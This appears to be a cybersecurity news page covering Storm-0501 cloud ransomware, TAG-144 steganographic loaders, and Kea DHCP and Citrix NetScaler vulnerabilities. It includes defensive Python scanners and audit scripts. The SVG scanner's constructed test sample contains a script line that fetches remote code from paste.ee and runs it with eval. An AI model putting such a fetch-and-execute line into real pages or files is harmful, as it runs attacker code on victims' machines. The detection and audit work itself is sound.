Microsoft Threat Intelligence has detailed the evolving tactics of the financially motivated threat actor Storm-0501, which has transitioned from traditional on-premises ransomware deployments to sophisticated cloud-based operations. Unlike conventional ransomware that relies on endpoint encryption malware and subsequent decryption key negotiations, Storm-0501 exploits cloud-native capabilities to exfiltrate massive data volumes, obliterate backups, and enforce ransom […]
The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) announced a fresh round of sanctions against two individuals and two entities for their role in the North Korean remote information technology (IT) worker scheme to generate illicit revenue for the regime’s weapons of mass destruction and ballistic missile programs.
“The North Korean regime continues to target American
Over the past year, a shadowy threat actor known as TAG-144—also tracked under aliases Blind Eagle and APT-C-36—has intensified operations against South American government institutions.
First observed in 2018, this group has adopted an array of commodity remote access trojans (RATs) such as AsyncRAT, REMCOS RAT, and XWorm, often delivered through highly targeted spearphishing campaigns masquerading as official judicial or tax notifications.
In mid-2025, Recorded Future analysts noted a significant uptick in activity, with five distinct clusters deploying new infrastructure and exploiting legitimate internet services to stage malware payloads.
Initial access typically leverages compromised or spoofed email accounts from local government agencies, luring users into opening malicious documents or SVG attachments.
These attachments often contain embedded JavaScript that, when executed, retrieves a second-stage loader from services like Paste.ee or Discord’s CDN.
Recorded Future researchers identified numerous compromised Colombian government email addresses used to send deceptive legal summonses, illustrating the adversary’s ability to blend social engineering with technical subterfuge.
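The SVG lure described above works because SVG is XML that browsers and many viewers will execute: a `<script>` element, an `on*` event handler or a `javascript:` href is all legal markup. The following gateway-side check is an added example for this page, not code from Recorded Future or from the campaign; the marker strings, sample documents and the constructed `paste.ee` URL are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Second-stage hosting services the article names; extend per environment.
STAGING_HOSTS = ("paste.ee", "cdn.discordapp.com")
RISKY_SCHEMES = ("javascript:", "data:")


def _local(name: str) -> str:
    """Strip an XML namespace, e.g. '{http://www.w3.org/1999/xlink}href' -> 'href'."""
    return name.rsplit("}", 1)[-1]


def analyse_svg(svg_text: str) -> dict:
    """Report active-content indicators in an SVG attachment.

    <script>, on* event handlers and javascript:/data: hrefs are legal SVG
    syntax that renderers execute; a mail gateway should block or detonate an
    attachment containing any of them. Production code should parse untrusted
    XML with defusedxml rather than the stock parser used here.
    """
    findings = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return {"verdict": "block", "findings": [f"malformed XML: {exc}"]}

    for el in root.iter():
        tag = _local(el.tag)
        if tag == "script":
            findings.append("<script> element present")
            body = (el.text or "").lower()
            findings.extend(f"script references staging host {h}" for h in STAGING_HOSTS if h in body)
        for attr, value in el.attrib.items():
            name = _local(attr).lower()
            low = value.strip().lower()
            if name.startswith("on") and len(name) > 2:
                findings.append(f"event handler {name} on <{tag}>")
            if name == "href":
                if low.startswith(RISKY_SCHEMES):
                    findings.append(f"{low.split(':', 1)[0]}: href on <{tag}>")
                findings.extend(f"href to staging host {h} on <{tag}>" for h in STAGING_HOSTS if h in low)
    return {"verdict": "block" if findings else "allow", "findings": findings}


# Constructed sample shaped like the lure described in the article; not a real artefact.
MALICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="600" height="400" onload="init()">
  <text x="20" y="40">Notificacion judicial</text>
  <a xlink:href="javascript:void(0)"><rect width="10" height="10"/></a>
  <script><![CDATA[
    fetch("https://paste.ee/r/EXAMPLE").then(r => r.text()).then(eval);
  ]]></script>
</svg>"""

BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="blue"/>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_SVG), ("benign", BENIGN_SVG)):
        print(label, analyse_svg(doc))
```

The check walks every element rather than pattern-matching the raw text, so namespaced attributes such as `xlink:href` and script bodies wrapped in CDATA are still seen. Unparseable input is blocked rather than allowed, since a renderer's lenient parser may still execute what a strict one rejects.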
Phishing pages linked to Cluster 4 (Source – Recordedfuture)
The impact of TAG-144’s campaigns has been most severe in Colombia’s federal and municipal agencies, where exfiltration of credentials and sensitive data poses both espionage and financial extortion risks.
Despite sharing core tactics across clusters—dynamic DNS domains, open-source RATs, and stolen crypters—the group’s evolving use of steganography and domain generation algorithms (DGAs) marks a notable shift toward more resilient operations.
Recorded Future analysts noted that this evolution not only complicates traditional defenses but also underscores the blurred line between cybercrime and state-level espionage.
Infection Mechanism and Steganographic Payload Extraction
One of TAG-144’s most sophisticated techniques involves embedding a Base64-encoded .NET assembly within the pixel data of a benign JPEG image hosted on Archive[.]org.
Payload hosted on archive[.]org URL (Source – Recordedfuture)
Upon execution of the initial PowerShell script, the loader scans the image for a predefined byte marker, carves out and decodes the Base64 text that follows it, and loads the resulting assembly directly in memory rather than writing it to disk, which sidesteps file-based antivirus scanning. It does not make the activity invisible: PowerShell script-block logging and AMSI scanning of in-memory .NET assembly loads still record the decoded script and the loaded assembly.
For example, the deobfuscated PowerShell segment responsible for this process appears as:
This in-memory injection, coupled with dynamic domain resolution—often leveraging services like duckdns.org and noip.com—ensures that the RAT’s command-and-control infrastructure remains agile and difficult to trace.
By avoiding traditional executable downloads and utilizing steganography, TAG-144 demonstrates an advanced understanding of both detection evasion and asset staging, posing a persistent threat to government networks across the region.
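The extraction logic described above can be reproduced on the defender's side to triage images pulled from a proxy or mail cache. The scanner below is an added example written for this page, not the loader itself or Recorded Future's code; the marker strings are an assumption (the article says a predefined marker exists but does not publish it) and the carrier image and embedded "assembly" are constructed stand-ins.

```python
import base64
import binascii
from typing import Optional

# Assumed marker pair: the loader's real marker is not published, so treat
# these as configuration to be replaced with the observed value.
DEFAULT_START = b"<<BASE64_START>>"
DEFAULT_END = b"<<BASE64_END>>"


def extract_marked_payload(blob: bytes, start: bytes = DEFAULT_START,
                           end: bytes = DEFAULT_END) -> Optional[bytes]:
    """Locate the marker, take the Base64 text up to the end marker and decode it.

    The carrier is treated as an opaque byte stream, so the marker is found
    wherever the author placed it. Line breaks inside the Base64 are tolerated;
    a missing end marker or invalid Base64 yields None.
    """
    i = blob.find(start)
    if i < 0:
        return None
    j = blob.find(end, i + len(start))
    if j < 0:
        return None
    b64 = b"".join(blob[i + len(start):j].split())  # drop whitespace and newlines
    try:
        return base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None


def describe_payload(payload: bytes) -> dict:
    """Cheap static triage of a carved blob: PE header and .NET runtime strings."""
    is_pe = payload[:2] == b"MZ"
    dotnet_markers = (b"mscoree.dll", b"_CorExeMain", b"_CorDllMain", b"BSJB")
    return {
        "is_pe": is_pe,
        "looks_dotnet": is_pe and any(m in payload for m in dotnet_markers),
        "size": len(payload),
    }


def scan_image(blob: bytes, start: bytes = DEFAULT_START, end: bytes = DEFAULT_END) -> dict:
    """Inspect an image file for a marker-delimited embedded executable."""
    result = {"is_jpeg": blob[:3] == b"\xff\xd8\xff", "payload_found": False}
    payload = extract_marked_payload(blob, start, end)
    if payload is not None:
        result["payload_found"] = True
        result.update(describe_payload(payload))
    return result


def build_sample() -> bytes:
    """Constructed carrier: minimal JPEG framing with a fake PE stub embedded.

    The 'assembly' is a DOS header plus .NET runtime strings, not a runnable
    executable; it exists only so the scan has something realistic to find.
    """
    fake_assembly = (b"MZ" + b"\x90" * 62 + b"This program cannot be run in DOS mode.\r\n"
                     + b"PE\x00\x00" + b"BSJB" + b"mscoree.dll\x00_CorExeMain\x00")
    b64 = base64.b64encode(fake_assembly)
    wrapped = b"\n".join(b64[k:k + 76] for k in range(0, len(b64), 76))  # line-wrapped text
    return (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 64
            + DEFAULT_START + b"\n" + wrapped + b"\n" + DEFAULT_END + b"\xff\xd9")


if __name__ == "__main__":
    print(scan_image(build_sample()))
```

If a loader variant transforms the Base64 before decoding (reversed text, XOR, a different marker), replicate that step in `extract_marked_payload`; the JPEG framing check is informational only, since the carrier being a valid image is exactly the point of the technique.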
A recent investigation has uncovered that relying solely on large language models (LLMs) to generate application code can introduce critical security vulnerabilities, according to a detailed blog post published on August 22, 2025. The research underscores that LLMs, which are trained on broad internet data—much of it insecure example code—often replicate unsafe patterns without warning […]
Cybersecurity researchers at Truesec have uncovered a sophisticated malware campaign distributing a weaponized PDF editor under the guise of “AppSuite PDF Editor.” This operation, which began on June 26, 2025, involves multiple websites promoting the software as a free utility tool, overlapping with findings from Expel on similar threats like ManualFinder. The malicious executable, PDF […]
A newly disclosed vulnerability in the widely used ISC Kea DHCP server poses a significant security risk to network infrastructure worldwide.
The flaw, designated CVE-2025-40779, allows remote attackers to crash DHCP services with just a single maliciously crafted packet, potentially disrupting network operations across entire organizations.
The vulnerability affects multiple versions of the Kea DHCP server, including versions 2.7.1 through 2.7.9, 3.0.0, and 3.1.0.
Key Takeaways
1. CVE-2025-40779 lets attackers crash Kea DHCPv4 with one crafted unicast packet.
2. Affects Kea 2.7.1–2.7.9, 3.0.0, 3.1.0; CVSS 7.5; no workaround.
3. Upgrade immediately.
Network administrators running these versions face immediate exposure to denial-of-service attacks that require no authentication or special privileges to execute.
Kea DHCP Server DoS Vulnerability
The vulnerability stems from an assertion failure in the kea-dhcp4 process when specific client options interact with the subnet selection mechanism.
When a DHCPv4 client transmits a request containing particular option combinations, and the Kea server fails to locate an appropriate subnet for that client, the service terminates unexpectedly with a fatal assertion error.
Only unicast DHCPv4 messages addressed directly to the Kea server trigger the flaw; the broadcast DISCOVER and REQUEST traffic that makes up most normal DHCP exchanges does not.
That distinction makes an accidental crash unlikely but does little to limit a deliberate attack: any host that can reach the server's UDP port 67 can send a crafted unicast request, and requests forwarded by DHCP relay agents also arrive as unicast, so relayed segments are exposed as well.
The Common Vulnerability Scoring System (CVSS) has assigned this flaw a score of 7.5, categorizing it as high severity.
The CVSS vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H indicates that the vulnerability can be exploited remotely with low complexity, requires no privileges or user interaction, and results in high availability impact.
The vulnerability was discovered through collaborative security research, with acknowledgments going to Jochen M., Martin Dinev from Trading212, Ashwani Kumar from the Post Graduate Institute of Medical Education & Research in Chandigarh, India, Bret Giddings from the University of Essex, and Florian Ritterhoff from Munich University of Applied Sciences.
Risk Factors / Details
Affected Products: Kea 2.7.1 – 2.7.9, 3.0.0, 3.1.0
Impact: Denial of Service
Exploit Prerequisites: Remote unicast DHCPv4 request with specific client option set
CVSS 3.1 Score: 7.5 (High)
Mitigations
ISC has released patched versions to address this high-severity vulnerability. Organizations running an affected release should upgrade to Kea 3.0.1 (stable branch) or 3.1.1 (development branch), whichever matches their deployment.
No workarounds exist for this vulnerability, making immediate patching the only viable defense strategy.
Network administrators should prioritize this update, as DHCP services represent critical infrastructure components.
A successful attack could render entire network segments unable to obtain IP addresses, effectively creating widespread connectivity outages.
While ISC reports no known active exploits, the simplicity of the attack vector makes this vulnerability an attractive target for malicious actors seeking to disrupt network operations.
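Because the affected releases span a development series and two branch heads, a fleet audit needs more than a string match. The helper below is an added example for this page, not ISC tooling; it encodes the affected and fixed versions listed above and parses the version out of `kea-dhcp4 -v` style output. Mapping the 2.7.x development series to either fixed branch is an assumption: choose the branch your change policy allows.

```python
import re
from typing import List, Optional, Tuple

Version = Tuple[int, int, int]

# Release ranges as reported above (inclusive), and the fixed release per branch.
AFFECTED_DEV_RANGE = ((2, 7, 1), (2, 7, 9))
AFFECTED_EXACT = {(3, 0, 0), (3, 1, 0)}
FIXED_BY_BRANCH = {(3, 0): "3.0.1", (3, 1): "3.1.1"}

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_kea_version(text: str) -> Optional[Version]:
    """Pull the first x.y.z version out of e.g. `kea-dhcp4 -v` output."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)


def is_affected(version: Version) -> bool:
    """True for 2.7.1 through 2.7.9, 3.0.0 and 3.1.0; older stable releases are not listed."""
    lo, hi = AFFECTED_DEV_RANGE
    return lo <= version <= hi or version in AFFECTED_EXACT


def upgrade_targets(version: Version) -> List[str]:
    """Fixed releases that resolve CVE-2025-40779 for the given affected version."""
    if not is_affected(version):
        return []
    branch = version[:2]
    if branch in FIXED_BY_BRANCH:
        return [FIXED_BY_BRANCH[branch]]
    # 2.7.x was the development series that led to 3.0/3.1; either fixed branch
    # closes the bug (assumption: pick per your stable/development policy).
    return ["3.0.1", "3.1.1"]


def assess(version_text: str) -> dict:
    """One record per host, suitable for feeding into an inventory or ticket."""
    v = parse_kea_version(version_text)
    if v is None:
        return {"version": None, "affected": None, "upgrade_to": [], "note": "unparseable"}
    return {
        "version": ".".join(map(str, v)),
        "affected": is_affected(v),
        "upgrade_to": upgrade_targets(v),
    }


if __name__ == "__main__":
    # Constructed sample outputs, one per host.
    for host, out in (("dhcp-a", "2.7.9"), ("dhcp-b", "3.0.1"), ("dhcp-c", "2.6.3")):
        print(host, assess(out))
```

Run `kea-dhcp4 -v` on each server (or read the version from the Kea control agent's `version-get` response) and pass the text to `assess`; anything with `"affected": True` has no workaround and needs the listed upgrade.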
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
The Cybersecurity and Infrastructure Security Agency (CISA) unveiled a comprehensive Cybersecurity Advisory (CSA) designed to empower network defenders to detect, hunt, and mitigate the activities of advanced persistent threat (APT) actors linked to the People’s Republic of China. Drawing on a coordinated effort with the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), […]
Microsoft Threat Intelligence has released a detailed report exposing a significant evolution in ransomware attacks, pioneered by the financially motivated threat actor Storm-0501.
The group has shifted from traditional on-premises ransomware to a more destructive, cloud-native strategy that involves data exfiltration and destruction, fundamentally changing the nature of ransomware threats for businesses operating in hybrid cloud environments.
Unlike conventional attacks that encrypt files on local servers and demand payment for a decryption key, Storm-0501’s new method is far more devastating.
Overview of Storm-0501 cloud-based ransomware attack chain.
The group leverages cloud-native capabilities to first exfiltrate massive volumes of sensitive data, then systematically destroys the original data and any backups within the victim’s cloud environment before demanding a ransom.
This “steal-and-destroy” tactic removes the option of restoring from the cloud backups the attackers have already wiped and places immense pressure on victim organizations.
The attack chain, as detailed by Microsoft, is a sophisticated blend of on-premises and cloud infiltration. It often begins with a compromise of a company’s local Active Directory.
From this foothold, the attackers pivot to the cloud, targeting Microsoft Entra ID (formerly Azure AD). Their primary objective is to find a high-privilege account, such as a Global Administrator, that lacks robust security, particularly multi-factor authentication (MFA).
In a recent campaign analyzed by Microsoft, Storm-0501 identified a synced, non-human Global Administrator account without a registered MFA method.
Storm-0501 Attack Chain
The attackers reset the account’s password on-premises, and the new password synchronized to Entra ID. Because no MFA method was registered, they could register their own device at first sign-in, sidestepping the existing MFA policies and gaining complete control of the tenant.
With top-level administrative access, the attackers elevate their privileges within Azure to become an “Owner” of all the organization’s cloud subscriptions.
They then initiate a discovery phase to map out critical assets, including data stores and backups. Following discovery, they exfiltrate the data using cloud tools like AzCopy.
The final impact phase is swift and catastrophic. Storm-0501 initiates a mass-deletion of Azure resources, including storage accounts, virtual machine snapshots, and recovery vaults.
For data protected by resource locks or immutability policies, the attackers first attempt to disable these protections. If unsuccessful, they resort to encrypting the remaining data with a key they control and then deleting the key, rendering the information permanently inaccessible. The extortion demand is then typically delivered via Microsoft Teams using a compromised account.
To combat these threats, Microsoft is urging organizations to adopt a multi-layered defense strategy. Key recommendations include enforcing phishing-resistant MFA for all users, practicing the principle of least privilege, and ensuring privileged accounts are cloud-native and secured.
Microsoft also highlights the importance of using built-in cloud security features like Microsoft Defender for Cloud, applying resource locks to critical assets, and enabling immutability and soft-delete policies on storage and key vaults to prevent irreversible data loss.
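The three preconditions Storm-0501 relied on (a Global Administrator that is synced from on-premises AD, that is a non-human account, and that has no registered MFA method) can be checked directly against Microsoft Graph. The audit below is an added example for this page, not Microsoft's code or tooling; it runs over the shape of the Graph responses rather than calling the API, so the role members and authentication methods are constructed sample data, and the permission names and `$select` query are assumptions to adapt to your tenant.

```python
from typing import Dict, List

# Well-known roleTemplateId of the Global Administrator directory role.
GLOBAL_ADMIN_TEMPLATE_ID = "62e90394-69f5-4237-9190-012177145e10"

# Graph @odata.type values that count as a usable second factor; password and
# e-mail (self-service reset only) are deliberately excluded.
MFA_METHOD_TYPES = {
    "#microsoft.graph.microsoftAuthenticatorAuthenticationMethod",
    "#microsoft.graph.fido2AuthenticationMethod",
    "#microsoft.graph.phoneAuthenticationMethod",
    "#microsoft.graph.softwareOathAuthenticationMethod",
    "#microsoft.graph.windowsHelloForBusinessAuthenticationMethod",
}
PHISHING_RESISTANT_TYPES = {
    "#microsoft.graph.fido2AuthenticationMethod",
    "#microsoft.graph.windowsHelloForBusinessAuthenticationMethod",
}


def audit_global_admins(members: List[dict], methods_by_user: Dict[str, List[dict]]) -> List[dict]:
    """Flag Global Administrators that match the preconditions of the attack above.

    members: user objects as returned by (assumed query)
      GET /v1.0/directoryRoles(roleTemplateId='<GLOBAL_ADMIN_TEMPLATE_ID>')/members
          ?$select=id,userPrincipalName,onPremisesSyncEnabled
    methods_by_user: user id -> list from GET /v1.0/users/{id}/authentication/methods
    Fetching both needs a token with RoleManagement.Read.Directory and
    UserAuthenticationMethod.Read.All (assumed; adjust to your app registration).
    """
    findings = []
    for m in members:
        if m.get("@odata.type") != "#microsoft.graph.user":
            continue  # groups or service principals in the role are out of scope here
        types = {x.get("@odata.type") for x in methods_by_user.get(m["id"], [])}
        synced = bool(m.get("onPremisesSyncEnabled"))
        has_mfa = bool(types & MFA_METHOD_TYPES)
        reasons = []
        if synced:
            reasons.append("synced from on-premises AD (an on-prem password reset propagates to the cloud)")
        if not has_mfa:
            reasons.append("no MFA method registered (an attacker can enrol their own)")
        elif not types & PHISHING_RESISTANT_TYPES:
            reasons.append("MFA registered but not phishing-resistant")
        if reasons:
            findings.append({
                "upn": m["userPrincipalName"],
                "reasons": reasons,
                # the exact combination used in the campaign: synced and no second factor
                "critical": synced and not has_mfa,
            })
    return findings


# Constructed sample data in the shape Graph returns; not from any real tenant.
SAMPLE_MEMBERS = [
    {"@odata.type": "#microsoft.graph.user", "id": "u1",
     "userPrincipalName": "svc-sync-admin@example.com", "onPremisesSyncEnabled": True},
    {"@odata.type": "#microsoft.graph.user", "id": "u2",
     "userPrincipalName": "breakglass@example.com", "onPremisesSyncEnabled": None},
    {"@odata.type": "#microsoft.graph.user", "id": "u3",
     "userPrincipalName": "alice.admin@example.com", "onPremisesSyncEnabled": None},
    {"@odata.type": "#microsoft.graph.group", "id": "g1", "displayName": "PIM eligible"},
]
SAMPLE_METHODS = {
    "u1": [{"@odata.type": "#microsoft.graph.passwordAuthenticationMethod"}],
    "u2": [{"@odata.type": "#microsoft.graph.passwordAuthenticationMethod"},
           {"@odata.type": "#microsoft.graph.fido2AuthenticationMethod"}],
    "u3": [{"@odata.type": "#microsoft.graph.passwordAuthenticationMethod"},
           {"@odata.type": "#microsoft.graph.phoneAuthenticationMethod"}],
}

if __name__ == "__main__":
    for f in audit_global_admins(SAMPLE_MEMBERS, SAMPLE_METHODS):
        print(("CRITICAL " if f["critical"] else "review   ") + f["upn"], f["reasons"])
```

A `critical` hit is an account that an on-premises attacker can take over exactly as described: reset the password in AD, wait for sync, sign in and register their own authenticator. The remediation is the one Microsoft recommends above: make privileged accounts cloud-only, and require a phishing-resistant method on each of them.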
Storm-0501, previously known for attacks on U.S. school districts and the healthcare sector, continues to demonstrate its proficiency in navigating complex hybrid environments, underscoring the urgent need for businesses to adapt their security posture for the cloud era.
The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert after detecting active exploitation of a critical zero-day remote code execution (RCE) vulnerability in Citrix NetScaler devices. Designated CVE-2025-7775, the flaw stems from a memory overflow in NetScaler’s traffic management subsystem and was recently added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog. Evidence […]
CISA has issued an urgent warning regarding a critical zero-day vulnerability affecting Citrix NetScaler systems, designated as CVE-2025-7775.
This memory overflow vulnerability enables remote code execution (RCE) and has been actively exploited by malicious cyber actors, prompting immediate inclusion in CISA’s Known Exploited Vulnerabilities (KEV) Catalog on August 26, 2025.
The vulnerability, classified as a memory overflow flaw, affects Citrix NetScaler Application Delivery Controller (ADC) and Gateway systems.
Memory overflow vulnerabilities occur when applications write data beyond allocated memory boundaries, potentially allowing attackers to execute arbitrary code on vulnerable systems.
In the context of NetScaler infrastructure, this represents a particularly severe threat vector given these systems’ critical role in enterprise network architecture.
The Common Vulnerability Scoring System (CVSS) classification and technical specifics indicate this is a buffer overflow condition that can be triggered remotely without authentication requirements.
Exploitation of a flaw of this class typically involves crafting HTTP requests whose payloads exceed the buffer the appliance allocates, corrupting memory and, when the corruption is controlled precisely, executing code with the privileges of the packet-processing process.
NetScaler systems running vulnerable firmware versions are therefore exposed to unauthenticated remote attacks in which specially crafted requests trigger the overflow condition.
Because the affected code runs in the packet processing engine that terminates client traffic, a successful exploit gives the attacker code execution on the appliance itself, from which the security controls it enforces can be bypassed and administrative access to the device obtained.
Exploit Prerequisites: network reachability of the vulnerable NetScaler service (the flaw is in the traffic-management subsystem that handles client requests, so exposure is not confined to the management interface); no authentication required; ability to send crafted HTTP requests; target running a vulnerable firmware version
CVSS 3.1 Score: 9.8 (Critical)
Remediation
CISA’s Binding Operational Directive (BOD) 22-01 requires all Federal Civilian Executive Branch (FCEB) agencies to remediate CVE-2025-7775 by the due date set in its KEV Catalog entry.
The directive ties remediation deadlines to inclusion in the catalog, which is driven by evidence of active exploitation rather than by severity score alone.
Organizations must implement network segmentation and access control lists (ACLs) as temporary mitigation measures while applying vendor-provided patches.
Citrix has released a security bulletin containing firmware updates that address the memory overflow condition through improved bounds checking and input validation mechanisms.
System administrators should prioritize upgrading to a NetScaler firmware build that Citrix’s bulletin lists as containing the fix, and verify the running build on each appliance after the upgrade.
Additionally, implementing Web Application Firewall (WAF) rules can help detect and block exploitation attempts targeting the vulnerable code path.
The inclusion of CVE-2025-7775 in the KEV Catalog highlights the critical nature of this vulnerability and the documented evidence of active exploitation in the wild, necessitating an immediate organizational response to prevent potential compromise of enterprise network infrastructure.